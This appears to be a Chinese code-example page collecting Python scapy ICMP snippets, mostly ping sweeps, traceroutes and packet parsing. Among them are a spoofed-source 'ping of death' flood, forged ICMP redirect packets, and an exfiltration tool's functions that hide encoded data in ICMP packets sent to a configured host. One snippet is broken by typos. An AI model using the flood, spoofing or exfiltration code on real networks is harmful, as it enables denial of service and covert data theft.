我们从Python开源项目中,提取了以下31个代码示例,用于说明如何使用scapy.all.ICMP。
def detect_inactive_hosts(scan_hosts): """ Scans the network to find scan_hosts are live or dead scan_hosts can be like 10.0.2.2-4 to cover range. See Scapy docs for specifying targets. """ global scheduler scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, )) inactive_hosts = [] try: ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1) ans.summary(lambda r : r.sprintf("%IP.src% is alive")) for inactive in unans: print ("%s is inactive" %inactive.dst) inactive_hosts.append(inactive.dst) print ("Total %d hosts are inactive" %(len(inactive_hosts))) except KeyboardInterrupt: exit(0)
def build_icmp(self): pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\ IP(src=self.target, dst=self.gateway)/UDP() return pkt
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose): if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface ans,unans=sr(IP(dst=ip, proto=(0,255))/"SCAPY",retry=0,timeout=2, verbose=True) for s,r in ans: print(r.summary()) if not ICMP in r: r.show()
def listen(): app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..") # Filter for echo requests only to prevent capturing generated replies scapy.sniff(filter="icmp and icmp[0]=8", prn=analyze)
def test_icmp(self): def process_response(echo_reply, dest): ans, unans = echo_reply if ans: log.msg("Received echo reply from %s: %s" % (dest, ans)) else: log.msg("No reply was received from %s. Possible censorship event." % dest) log.debug("Unanswered packets: %s" % unans) self.report[dest] = echo_reply for label, data in self.destinations.items(): reply = sr1(IP(dst=lebal) / ICMP()) process = process_reponse(reply, label) #(ans, unans) = ping #self.destinations[self.dst].update({'ans': ans, # 'unans': unans, # 'response_packet': ping}) #return ping #return reply
def get_last_ping_reply_ts(path): """Returns last ICMP echo response timestamp. If there are no replies in packets - it returns None. Args: packets (list): list packets Returns: float|None: last ICMP reply timestamp or None """ last_replied_ts = None for packet in read_pcap(path, lfilter=filter_icmp): if not filter_icmp(packet): continue if packet[scapy.ICMP].type == TYPE_ICMP_REPLY: last_replied_ts = max(last_replied_ts, packet.time) return last_replied_ts
def detect_inactive_hosts(scan_hosts): """ Scans the network to find scan_hosts are live or dead scan_hosts can be like 10.0.2.2-4 to cover range. See Scapy docs for spefifying targets. """ global scheduler scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, )) inactive_hosts = [] try: ans, unans = sr(IP(dst = scan_hosts)/ICMP(), retry = 0, timeout = 1) ans.summary(lambda(s, r) : r.sprintf("%IP.src% is alive")) for inactive in unans: print "%s is inactive" %inactive.dst inactive_hosts.append(inactive.dst) print "Total %d hosts are inactive" %(len(inactive_hosts)) except KeyboardInterrupt: exit(0)
def asns_in_traceroute(traceroute, asndb): """ Extract ASNs of hops in traceroute and return them as list. """ asns = [] for sent, recvd in traceroute: # Is the response an ICMP TTL Exceeded packet? if recvd.haslayer(scapy.ICMP) and recvd.payload.type == 11: asn, _ = asndb.lookup(recvd.src) if asn is not None: asns.append(asn) return asns
def generator(self, n, filename): time = 0.00114108 * n + 0.157758 minutes = time/60 print('Generating packets, it will take %s seconds, moreless (%s, minutes)' % (time, minutes)) pkgs = [IP(dst='10.0.0.1')/ICMP() for i in range(n)] wrpcap(filename, pkgs) print('%s packets generated.' % (n))
def ping_of_death(self, target): from scapy.all import IP, ICMP, send src = "%i.%i.%i.%i" % ( random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) ip_hdr = IP(src, target) _packet = ip_hdr / ICMP() / (str(os.urandom(65500))) send(_packet)
def get_gateway(self): p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0) return p.src
def heartbeat_call(self, event): # Send a packet to every WiFiTrilat server. for host in [s[1:s.find('/WiFi')] for s in self.client.discover()]: #sr(IP(dst=host)/ICMP(), iface=self.interface) cli.execute(command='ping -c 4 %s' % host, wait=False, shellexec=True)
def send(data): data = base64.b64encode(data) app_exfiltrate.log_message( 'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data))) scapy.sendp(scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
def analyze(packet): src = packet.payload.src dst = packet.payload.dst try: app_exfiltrate.log_message( 'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst)) app_exfiltrate.retrieve_data(base64.b64decode(packet.load)) except: pass
def make_stamp(pkt): if s.IP in pkt: ip_send = pkt[s.IP].src ip_rec = pkt[s.IP].dst else: return None if s.TCP in pkt: # port_send = pkt[TCP].sport # port_rec = pkt[TCP].dport protocol = "TCP" elif s.UDP in pkt: # port_send = pkt[UDP].sport # port_rec = pkt[UDP].dport protocol = "UDP" elif s.ICMP in pkt: # port_send = 1 # pkt[ICMP].sport # port_rec = 1 # pkt[ICMP].dport protocol = "ICMP" else: return None # if not TCP or UDP or ICMP return ip_send, ip_rec, protocol
def ping_host(self, ip): """method to send ICMP/ARP requests and receive response from the host with @ip address. Returns a tuple (ip/host name, ONLINE/OFFLINE, response time)""" # form an ICMP or ARP packet packet = self.__gen_packet(ip) try: # send and wait for response answers, unanswers = self.__send_recv(packet) except PermissionError: raise PermissionException if self.__resolve_names: # resolve host name by ip if resolve_names # flag was set try: host = gethostbyaddr(ip)[HOST_NAME_INDEX] except herror: host = ip else: # otherwise show ip host = ip if answers: answer = answers[FIRST_INDEX] # get the request object req = answer[REQUEST_INDEX] # get the response object resp = answer[RESPONSE_INDEX] # calculate response time and round it delta = resp.time - req.sent_time return host, ONLINE, delta else: # return unansered results unanswer = unanswers[FIRST_INDEX] resp = unanswer[RESPONSE_INDEX] return host, OFFLINE, None
def test_icmp_ping(self): def finished(packets): print packets answered, unanswered = packets for snd, rcv in answered: rcv.show() packets = IP(dst=self.localOptions['target'])/ICMP() d = self.sr(packets) d.addCallback(finished) return d
def test_icmp_ping(self): packets = IP(dst=self.localOptions['target'])/ICMP() answered, unanswered = yield self.sr(packets) for snd, rcv in answered: rcv.show()
def ICMPTraceroute(self, host): if host not in self.hosts: self.hosts.append(host) d = defer.Deferred() reactor.callLater(self.timeout, d.callback, self) self.sendPackets(IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort()) / ICMP(id=RandShort())) return d
def packetReceived(self, packet): l = packet.getlayer(1) if not l: return elif isinstance(l, ICMP) or isinstance(l, UDP) or isinstance(l, TCP): self._recvbuf.append(packet)
def filter_icmp(packet): """Returns True if packet contains ICMP layer.""" return scapy.ICMP in packet
def send(data): data = base64.b64encode(app_exfiltrate.xor(data)) app_exfiltrate.log_message( 'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data))) scapy.sendp(scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
def listen(): app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..") scapy.sniff(filter="icmp", prn=analyze)
def cmd_ping(ip, count, timeout, wait, verbose): conf.verb = False layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del(ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def cmd_icmp(ip, verbose): conf.verb = False #pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port) pkt = IP(dst=ip) / ICMP()# , proto=(0, 255)) # / TCP(flags=(0, 255), dport=port) messages = [ (8, 0), # echo request (13, 0), # timestamp (15, 0), # info request #(), # #(), # ] #print(pkts.summary()) #print(pkts.show2()) #print(icmpcodes) for itype, icode in messages: pkt[ICMP].type = itype pkt[ICMP].code = icode ans = sr1(pkt, timeout=0.2) if ans: print(ans.show()) # for icode in range(0, 256): # print(itype, icode) else: print("NOT ANSWER!!!") out = "{:>8} -> {:<8}" ''' for pkt in pkts: #if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags): print(pkt.show2()) ans = sr1(pkt, timeout=0.2) if ans: #if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags): #print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%"))) print(ans.show()) ''' return True